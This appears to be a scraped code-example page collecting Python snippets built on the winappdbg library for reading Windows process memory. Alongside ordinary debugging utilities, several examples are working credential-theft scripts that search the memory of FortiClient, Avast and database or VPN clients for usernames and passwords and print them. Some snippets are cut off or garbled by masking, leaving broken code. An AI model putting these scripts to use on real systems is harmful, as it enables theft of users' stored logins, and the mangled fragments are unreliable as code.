Exemplo n.º 1
0
def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.

        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
        
        print 'Possible UserIDs found:'
        found = [i[-1] for i in found]
        for i in set(found):
           print i.replace('\x00','')
        
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'******'[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
        
        return found
Exemplo n.º 2
0
def main():
    print("Process memory reader")
    print("by Mario Vilas (mvilas at gmail.com)")
    print

    if len(sys.argv) not in (4, 5):
        script = os.path.basename(sys.argv[0])
        print("  %s <pid> <address> <size> [binary output file]" % script)
        print("  %s <process.exe> <address> <size> [binary output file]" %
              script)
        return

    System.request_debug_privileges()

    try:
        pid = HexInput.integer(sys.argv[1])
    except:
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print("Process not found: %s" % sys.argv[1])
            return
        if len(pl) > 1:
            print("Multiple processes found for %s" % sys.argv[1])
            for p, n in pl:
                print("\t%s: %s" % (HexDump.integer(p), n))
            return
        pid = pl[0][0].get_pid()

    try:
        address = HexInput.integer(sys.argv[2])
    except Exception:
        print("Invalid value for address: %s" % sys.argv[2])
        return

    try:
        size = HexInput.integer(sys.argv[3])
    except Exception:
        print("Invalid value for size: %s" % sys.argv[3])
        return

    p = Process(pid)
    data = p.read(address, size)
    ##    data = p.peek(address, size)
    print("Read %d bytes from PID %d" % (len(data), pid))

    if len(sys.argv) == 5:
        filename = sys.argv[4]
        open(filename, 'wb').write(data)
        print("Written %d bytes to %s" % (len(data), filename))
    else:
        if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
            width = 16
        else:
            width = 8
        print
        print(HexDump.hexblock(data, address, width=width))
Exemplo n.º 3
0
def main():
    print "Process memory reader"
    print "by Mario Vilas (mvilas at gmail.com)"
    print

    if len(sys.argv) not in (4, 5):
        script = os.path.basename(sys.argv[0])
        print "  %s <pid> <address> <size> [binary output file]" % script
        print "  %s <process.exe> <address> <size> [binary output file]" % script
        return

    System.request_debug_privileges()

    try:
        pid = HexInput.integer(sys.argv[1])
    except:
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print "Process not found: %s" % sys.argv[1]
            return
        if len(pl) > 1:
            print "Multiple processes found for %s" % sys.argv[1]
            for p,n in pl:
                print "\t%s: %s" % (HexDump.integer(p),n)
            return
        pid = pl[0][0].get_pid()

    try:
        address = HexInput.integer(sys.argv[2])
    except Exception:
        print "Invalid value for address: %s" % sys.argv[2]
        return

    try:
        size = HexInput.integer(sys.argv[3])
    except Exception:
        print "Invalid value for size: %s" % sys.argv[3]
        return

    p = Process(pid)
    data = p.read(address, size)
##    data = p.peek(address, size)
    print "Read %d bytes from PID %d" % (len(data), pid)

    if len(sys.argv) == 5:
        filename = sys.argv[4]
        open(filename, 'wb').write(data)
        print "Written %d bytes to %s" % (len(data), filename)
    else:
        if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
            width = 16
        else:
            width = 8
        print
        print HexDump.hexblock(data, address, width = width)
Exemplo n.º 4
0
def process_read( pid, address, length ):
    # Instance a Process object.
    process = Process( pid )
# Read the process memory.
    data = process.read( address, length )
# You can also change the process memory.
    # process.write( address, "example data" )
    # Return a Python string with the memory contents.
    return data
Exemplo n.º 5
0
def hex_string(pid, addr, size, flag=1):

    x = int(addr, 16)

    process = Process(pid)

    data = process.read(x, size * 8)
    #hexdump = HexDump.printable( data )

    if flag == 3:
        print HexDump.hexblock_dword(data, address=True, width=16)
    elif flag == 2:
        print HexDump.hexblock_word(data, address=True, width=16)
    else:
        print HexDump.hexblock(data, address=True, width=16)
Exemplo n.º 6
0
def show_disassemble(pid, addr, size, Flag=True):

    x = int(addr, 16)

    process = Process(pid)

    if Flag == True:
        code = process.disassemble(x, size * 8)
    else:
        data = process.read(x, size * 8)
        code = process.disassemble_string(x, data)

    s = ''
    for line in code:
        print CrashDump.dump_code_line(line, bShowDump=True, dwDumpWidth=16)
        s += CrashDump.dump_shell_line(line)

    return s
Exemplo n.º 7
0
def memory_search( pid, strings ):
                process = Process( pid )
                mem_dump = []
                                                                ######
                                                                # You could also use process.search_regexp to use regular expressions,
                                                                # or process.search_text for Unicode strings,
                                                                # or process.search_hexa for raw bytes represented in hex.
                                                                ######
                for address in process.search_bytes( strings ):
                                dump = process.read(address-10,800)                             #Dump 810 bytes from process memory
                                mem_dump.append(dump)
                                for i in mem_dump:
                                                if "FortiClient SSLVPN offline" in i:                       #print all founds results by offsets to the screen.
                                                                print "\n"
                                                                print " [+] Address and port to connect: " + str(i[136:180])
                                                                print " [+] UserName: "******" [+] Password: "******"\n"
Exemplo n.º 8
0
    def recvInPackets(self,event):
        nPid = event.get_pid()
        oProcess = Process(nPid)

        if(self.bStartLog ==True):

            #RECV_LENGTH_ADDRESS = 0x0018FC04
            #RECV_ADDRESS = 0x0018FC10
            RECV_LENGTH_ADDRESS = 0x0018FC14
            RECV_ADDRESS = 0x0018FC20
            if(oProcess.is_address_readable(RECV_ADDRESS)):
                    address = oProcess.read_pointer(RECV_ADDRESS)
                    if(oProcess.is_address_readable(address)):
                        sLength = oProcess.read(RECV_LENGTH_ADDRESS,1)
                        nLength = int(toHex(sLength),16)
                        if(nLength>0):
                            file = open("config/recv.cfg", "r") 
                            hPacket = self.checkInPacket(address,oProcess,nLength)

                            if(self.bBlock==True):
                                if(len(self.lBlockRecv)>0):
                                    for pck in self.lBlockRecv:
                                        if(hPacket == pck):
                                            bytes = len(hPacket)/2
                                            packie = ""
                                            for i in range(0,bytes):
                                                packie +="00"
                                            print packie
                                            blockPacket = binascii.unhexlify(packie)
                                            oProcess.write(address,blockPacket)
                                            hPacket = self.checkInPacket(address,oProcess,nLength)
                            if(hPacket[0:4]=='2901'):
                                stackDbg.put("RCV|"+hPacket)
                                self.recvQuests(hPacket)
                            elif(hPacket[0:4]=='5401'): 
                                stackDbg.put("RCV|"+hPacket)
                                self.editQuests(hPacket)
                            elif(hPacket[0:2]=='36'):
                                stackDbg.put("RCV|"+hPacket)
                            else:
                                stackDbg.put("RCV|"+hPacket)
                        
        else:
            event.debug.dont_break_at(nPid,self.hRecvAddress)
Exemplo n.º 9
0
def memory_search(pid, strings):
    process = Process(pid)
    mem_dump = []
    ######
    # You could also use process.search_regexp to use regular expressions,
    # or process.search_text for Unicode strings,
    # or process.search_hexa for raw bytes represented in hex.
    ######
    for address in process.search_bytes(strings):
        dump = process.read(address - 10,
                            800)  #Dump 810 bytes from process memory
        mem_dump.append(dump)
        for i in mem_dump:
            if "FortiClient SSLVPN offline" in i:  #print all founds results by offsets to the screen.
                print "\n"
                print " [+] Address and port to connect: " + str(i[136:180])
                print " [+] UserName: "******" [+] Password: "******"\n"
Exemplo n.º 10
0
def search_string(pid, func, size):

    process = Process(pid)

    print "get_image_base:", hex(process.get_image_base())
    print "get_main_module:", process.get_main_module()

    dosheader = process.read(process.get_image_base(), 100)
    print ''.join(["%02X " % ord(x) for x in dosheader]).strip()

    sys.exit(0)
    search_dll, search_func = _split_dll_func(func)
    print search_dll, ":", search_func
    if search_dll is None or search_func is None:
        print "%s not found!" % arg
        sys.exit(-1)

    dict = {}
    for file, file_addr in process.get_modules():
        if ismatch(file, ".*" + search_dll + "$") or ismatch(
                file, ".*" + search_dll + ".dll$"):
            print file, " : ", hex(file_addr), " (", file_addr, ")"

    return ""
Exemplo n.º 11
0
processname = "AvastUI.exe"
pid = 0
mem_contents = []

email = ""
password = ""

try:
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(processname):
        pid = process.get_pid()
    if pid is not 0:
        print ("AvastUI PID: " + str(pid))
        process = Process(pid)
        for i in process.search_regexp('"password":"******"Dump: "
            print process.read(i[0], 200)
        for i in mem_contents:
            password = i.split(",")[0]
        for i in process.search_regexp('"email":"'):
            mem_contents.append(process.read(i[0], 200))
            print "Dump: "
            print process.read(i[0], 200)
        for i in mem_contents:
            email = i.split(",")[0]
        if email != "" and password != "":
            print ""
            print "Found Credentials from Memory!"
            print email
            print password
Exemplo n.º 12
0
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
            memory_dump.append(process.read(address, 150))
        for i in range(len(memory_dump[0])):
            email_addr = memory_dump[i].split('email=')[1]
            tmp_passwd = memory_dump[i].split('password='******'&hiddenEmail=')[0]
            password = tmp_passwd.split('&rememberMe=')[0]
            if username != '' and password != '':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] Username: %s" % urllib.unquote_plus(username)
                print "[+] Password: %s" % password
                break
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
        print "[-] No process found with name '%s'." % (filename)
debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
			memory_dump.append(process.read(address,30))
		memory_dump.pop(0)
		for i in range(len(memory_dump)):
			str = b2h(memory_dump[i])
			first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
			last = first.split("00 ")
			if last[0]:
				count = count+1
				found = 1
				print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
		if found == 0:
			print "[-] Password not found! Make sure the client is connected at least to one database."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
Exemplo n.º 14
0
class Main(object):
    def __init__(self, argv):
        self.argv = argv

    def parse_cmdline(self):

        # An empty command line causes the help message to be shown
        if len(self.argv) == 1:
            self.argv = self.argv + ['-h']

        # Usage string
        usage = "%prog [options] <target process IDs or names...>"
        self.parser = optparse.OptionParser(usage=usage)

        # Options to set the search method
        search = optparse.OptionGroup(
            self.parser, "What to search",
            "(at least one of these switches must be used)")
        search.add_option("-s",
                          "--string",
                          action="append",
                          metavar="VALUE",
                          help="where VALUE is case sensitive text")
        search.add_option("-i",
                          "--istring",
                          action="append",
                          metavar="VALUE",
                          help="where VALUE is case insensitive text")
        search.add_option("-x",
                          "--hexa",
                          action="append",
                          metavar="VALUE",
                          help="where VALUE is hexadecimal data")
        search.add_option("-p",
                          "--pattern",
                          action="append",
                          metavar="VALUE",
                          help="where VALUE is an hexadecimal pattern")
        self.parser.add_option_group(search)

        # Options to control the search internals
        engine = optparse.OptionGroup(self.parser, "How to search")
        engine.add_option("-m", "--memory-pages",
                          action="store", type="int", metavar="NUMBER",
                          help="maximum number of consecutive memory pages" \
                               " to read (matches larger than this won't"   \
                               " be found)         "   \
                               "[default: 2, use 0 for no limit]")
        self.parser.add_option_group(engine)

        # Options to set the output type
        output = optparse.OptionGroup(self.parser, "What to show")
        output.add_option("-v",
                          "--verbose",
                          action="store_true",
                          dest="verbose",
                          help="verbose output")
        output.add_option("-q",
                          "--quiet",
                          action="store_false",
                          dest="verbose",
                          help="brief output [default]")
        self.parser.add_option_group(output)

        # Default values
        self.parser.set_defaults(
            string=[],
            istring=[],
            hexa=[],
            pattern=[],
            regexp=[],
            memory_pages=2,
            verbose=False,
        )

        # Parse the command line and check for validity
        (self.options, self.targets) = self.parser.parse_args(self.argv)

        # Our script's filename is not a target, skip it
        self.targets = self.targets[1:]

        # Fail if no search query was entered
        if not self.options.string  and \
           not self.options.istring and \
           not self.options.hexa    and \
           not self.options.pattern:
            self.parser.error("at least one search switch must be used")

    def prepare_input(self):

        # Build the lists of search objects
        self.build_searchers_list(StringSearch)
        self.build_searchers_list(TextSearch)
        self.build_searchers_list(HexSearch)
        self.build_searchers_list(PatternSearch)

        # Build the list of target pids
        self.build_targets_list()

    def build_searchers_list(self, cls):
        searchers = getattr(self.options, cls.name)
        for index in range(len(searchers)):
            try:
                searchers[index] = cls(searchers[index], index)
            except Exception as e:
                msg = cls.init_error_msg(index, searchers[index], e)
                self.parser.error(msg)

    def build_targets_list(self):

        # Take a process snapshot
        self.system = System()
        self.system.request_debug_privileges()
        self.system.scan_processes()

        # If no targets were given, search on all processes
        if not self.targets:
            self.targets = self.system.get_process_ids()

        # If targets were given, search only on those processes
        else:
            expanded_targets = set()
            for token in self.targets:
                try:
                    pid = HexInput.integer(token)
                    if not self.system.has_process(pid):
                        self.parser.error("process not found: %s" % token)
                    expanded_targets.add(pid)
                except ValueError:
                    found = self.system.find_processes_by_filename(token)
                    pidlist = [process.get_pid() for (process, _) in found]
                    if not pidlist:
                        self.parser.error("process not found: %s" % token)
                    expanded_targets.update(pidlist)
            self.targets = list(expanded_targets)

        # Sort the targets list
        self.targets.sort()

    def do_search(self):

        # For each target process...
        for self.pid in self.targets:

            # Try to open the process, skip on error
            try:
                self.process = Process(self.pid)
                self.process.get_handle()
            except WindowsError:
                print("Can't open process %d, skipping" % self.pid)
                if self.options.verbose:
                    print
                continue

            # Get a list of allocated memory regions
            memory = list()
            for mbi in self.process.get_memory_map():
                if mbi.State == win32.MEM_COMMIT and \
                                            not mbi.Protect & win32.PAGE_GUARD:
                    memory.append((mbi.BaseAddress, mbi.RegionSize))

            # If no allocation limit is set,
            # read entire regions and search on them
            if self.options.memory_pages <= 0:
                for (address, size) in memory:
                    try:
                        data = self.process.read(address, size)
                    except WindowsError as e:
                        begin = HexDump.address(address)
                        end = HexDump.address(address + size)
                        msg = "Error reading %s-%s: %s"
                        msg = msg % (begin, end, str(e))
                        print(msg)
                        if self.options.verbose:
                            print
                        continue
                    self.search_block(data, address, 0)

            # If an allocation limit is set,
            # read blocks within regions to search
            else:
                step = self.system.pageSize
                size = step * self.options.memory_pages
                for (address, total_size) in memory:
                    try:
                        end = address + total_size
                        shift = 0
                        buffer = self.process.read(address,
                                                   min(size, total_size))
                        while 1:
                            self.search_block(buffer, address, shift)
                            shift = step
                            address = address + step
                            if address >= end:
                                break
                            buffer = buffer[step:]
                            buffer = buffer + self.process.read(address, step)
                    except WindowsError as e:
                        begin = HexDump.address(address)
                        end = HexDump.address(address + total_size)
                        msg = "Error reading %s-%s: %s"
                        msg = msg % (begin, end, str(e))
                        print(msg)
                        if self.options.verbose:
                            print

    def search_block(self, data, address, shift):
        self.search_block_with(self.options.string, data, address, shift)
        self.search_block_with(self.options.istring, data, address, shift)
        self.search_block_with(self.options.hexa, data, address, shift)
        self.search_block_with(self.options.pattern, data, address, shift)

    def search_block_with(self, searchers_list, data, address, shift):
        for searcher in searchers_list:
            if shift == 0:
                searcher.restart()
            else:
                searcher.shift(shift)
            while 1:
                searcher.search(data)
                if not searcher.found():
                    break
                if self.options.verbose:
                    print(searcher.message(self.pid, address - shift, data))
                    print
                else:
                    print(searcher.message(self.pid, address - shift))

    def run(self):

        # Banner
        print("Process memory finder")
        print("by Mario Vilas (mvilas at gmail.com)")
        print

        # Parse the command line
        self.parse_cmdline()

        # Prepare the input
        self.prepare_input()

        # Perform the search on the selected targets
        self.do_search()
Exemplo n.º 15
0
        #pattern = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?0 ?4 ?? 00 ?? 00 00 00"

        pattern = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?0 ?4 ?? 00 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ??"

        f_data = process.search_hexa(pattern, base_addr, base_addr + reg_size)

        try:
            enc_con_addr = f_data.next()[0] + 0x18
        except:
            print "Not found"
            exit()

        print "[*] Encrypted config address: 0x%s" % HexDump.address(
            enc_con_addr, 32)
        enc_con = process.read(enc_con_addr, 0x2EF)
        RC4_key = process.read(enc_con_addr + 0x2EF, 0x39).rstrip('\x00')
        print "[*] RC4 key: %s" % RC4_key
        dec_con = RC4_dec(RC4_key, enc_con)
        conf = re.split("\x00+", dec_con)
        print "[*] Config: "
        for s in conf:
            print s

        print "[*] Dumping PE"
        PE_dump_path = "tmp_pe_dump"
        PE_dump = process.read(base_addr, reg_size)
        tmp_file = open(PE_dump_path, "wb+")
        tmp_file.write(PE_dump)
        tmp_file.close()
Exemplo n.º 16
0
def process_read(pid, address, length):

    process = Process(pid)
    # Read the process memory.
    data = process.read(address, length)
    return data
Exemplo n.º 17
0
def process_read(pid):  #, address, length):
    process = Process(pid)
    data = process.read(address, length)
    return data
Exemplo n.º 18
0
	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
			memory_dump.append(process.read(address,50))
		
		try:
			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
			usr = h2b(str.split(' 00')[0])
		except:
			pass
			
		memory_dump	= []
		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
			memory_dump.append(process.read(address,60))
		try:
			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
			pwd = h2b(str.split(' 00')[0])
		except:
			pass
Exemplo n.º 19
0
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
            memory_dump.append(process.read(address, 30))
        for i in range(len(memory_dump)):
            str = b2h(memory_dump[i])
            first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
            last = first.split(" 00 2D 70")
            if last[0]:
                usr = h2b(last[0])

        memory_dump = []
        for address in process.search_bytes(
                '\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        ):
            memory_dump.append(process.read(address, 100))
        sorted(set(memory_dump))
        for i in range(len(memory_dump)):
            str = b2h(memory_dump[i])
Exemplo n.º 20
0
    print "#########################################################################\r\n"
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
            memory_dump.append(process.read(address, 50))

        try:
            str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
            usr = h2b(str.split(' 00')[0])
        except:
            pass

        memory_dump = []
        for address in process.search_bytes(
                '\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
            memory_dump.append(process.read(address, 60))
        try:
            str = b2h(memory_dump[0]).split('07 00 02 09')[1]
            pwd = h2b(str.split(' 00')[0])
        except: